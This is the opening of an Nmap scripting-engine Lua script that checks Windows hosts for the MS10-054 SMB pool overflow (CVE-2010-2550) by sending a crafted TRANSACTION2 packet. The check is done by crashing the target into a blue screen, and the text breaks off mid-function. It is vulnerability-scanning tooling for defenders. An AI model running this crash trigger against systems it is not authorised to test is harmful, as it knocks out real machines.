local bin = require "bin" local msrpc = require "msrpc" local smb = require "smb" local string = require "string" local vulns = require "vulns" local stdnse = require "stdnse" description = [[ Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability. The vulnerable machine will crash with BSOD. The script requires at least READ access right to a share on a remote machine. Either with guest credentials or with specified username/password. ]] --- -- @usage nmap -p 445 --script=smb-vuln-ms10-054 --script-args unsafe -- -- @args unsafe Required to run the script, "safty swich" to prevent running it by accident -- @args smb-vuln-ms10-054.share Share to connect to (defaults to SharedDocs) -- @output -- Host script results: -- | smb-vuln-ms10-054: -- | VULNERABLE: -- | SMB remote memory corruption vulnerability -- | State: VULNERABLE -- | IDs: CVE:CVE-2010-2550 -- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- | Description: -- | The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, -- | Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 -- | does not properly validate fields in an SMB request, which allows remote attackers -- | to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." -- | -- | Disclosure date: 2010-08-11 -- | References: -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550 -- |_ http://seclists.org/fulldisclosure/2010/Aug/122 author = "Aleksandar Nikolic" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"vuln","intrusive","dos"} hostrule = function(host) return smb.get_port(host) ~= nil end -- stolen from smb.lua as max data count needed to be modified to trigger the crash local function send_transaction2(smbstate, sub_command, function_parameters) local header, parameters, data, command local parameter_offset = 0 local parameter_size = 0 local data_offset = 0 local data_size = 0 local total_word_count, total_data_count, reserved1, parameter_count, parameter_displacement, data_count, data_displacement, setup_count, reserved2 local response = {} -- Header is 0x20 bytes long (not counting NetBIOS header). header = smb.smb_encode_header(smbstate, smb.command_codes['SMB_COM_TRANSACTION2'], {}) -- 0x32 = SMB_COM_TRANSACTION2 if(function_parameters) then parameter_offset = 0x44 parameter_size = #function_parameters data_offset = #function_parameters + 33 + 32 end -- Parameters are 0x20 bytes long. parameters = bin.pack("